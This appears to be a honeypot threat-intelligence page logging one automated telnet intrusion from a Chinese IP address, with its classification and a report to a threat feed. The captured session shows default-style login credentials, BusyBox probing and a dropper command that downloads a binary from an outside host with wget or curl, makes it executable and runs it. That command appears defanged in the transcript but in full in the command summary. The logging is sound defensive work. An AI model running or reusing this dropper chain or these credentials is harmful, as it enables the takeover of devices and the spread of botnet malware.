HoneyMire HubAttack #291967 telnet
Source
115.54.188.52Target port23
Authenticatedyes
Commands11
Duration4.2s
Session recording
Transcript
cht
chtngpon
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x45\x45\x57\x58\x41\x57'
/bin/busybox wget;/bin/busybox echo -ne '\x45\x45\x57\x58\x41\x57'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://90[.]228[.]239[.]131:37930/i ||curl -O hxxp://90[.]228[.]239[.]131:37930/i ||/bin/busybox wget hxxp://90[.]228[.]239[.]131:37930/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x46\x4b\x59\x4d\x46\x46\x4f'
Credentials
Username: cht
Password: chtngpon
Geolocation hub-resolved
🇨🇳China · Henan · Zhengzhou
Behavioral classification
🦠
Matched signals:
- wget/curl download
- chmod/exec chain
- BusyBox probing
Command summary
start enable config terminal system linuxshell su shell sh >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x45\x45\x57\x58\x41\x57' /bin/busybox wget;/bin/busybox echo -ne '\x45\x45\x57\x58\x41\x57' >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://90.228.239.131:37930/i ||curl -O http://90.228.239.131:37930/i ||/bin/busybox wget http://90.228.239.131:37930/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x46\x46\x4b\x59\x4d\x46\x46\x4f'
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire